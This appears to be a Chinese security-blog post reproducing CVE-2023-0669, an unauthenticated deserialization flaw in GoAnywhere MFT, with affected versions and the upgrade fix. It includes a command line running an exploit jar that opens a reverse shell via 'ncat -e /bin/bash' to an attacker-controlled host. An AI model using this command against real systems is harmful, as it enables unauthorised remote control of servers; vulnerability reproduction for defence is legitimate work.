CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现

阅读量276267

发布时间 : 2023-02-17 15:30:42

LONDON, ENGLAND – AUGUST 09: In this photo illustration, A woman is silhouetted against a projection of a password log-in dialog box on August 09, 2017 in London, England. With so many areas of modern life requiring identity verification, online security remains a constant concern, especially following the recent spate of global hacks. (Photo by Leon Neal/Getty Images)

 

免责声明

文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!

 

GoAnywhereMFT

GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。

 

CVE-2023-0669

GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。

 

影响范围

GoAnywhereMFT小于7.1.2版本

 

漏洞复现

工具使用说明:

本地java版本:

使用命令反弹shell:
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://x.x.x.x/ -c "ncat -e /bin/bash yourvps yourport"

注意:-p 代理 不可不指定,否则会报错,将流量转到burp即可

burp数据包:

工具下载地址:公众号回复CVE-2023-0669获取

 

漏洞修复

更新到7.1.2版本。

本文由黑客前沿原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/286390

安全KER - 有思想的安全新媒体

分享到:微信
+10赞
收藏
黑客前沿
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66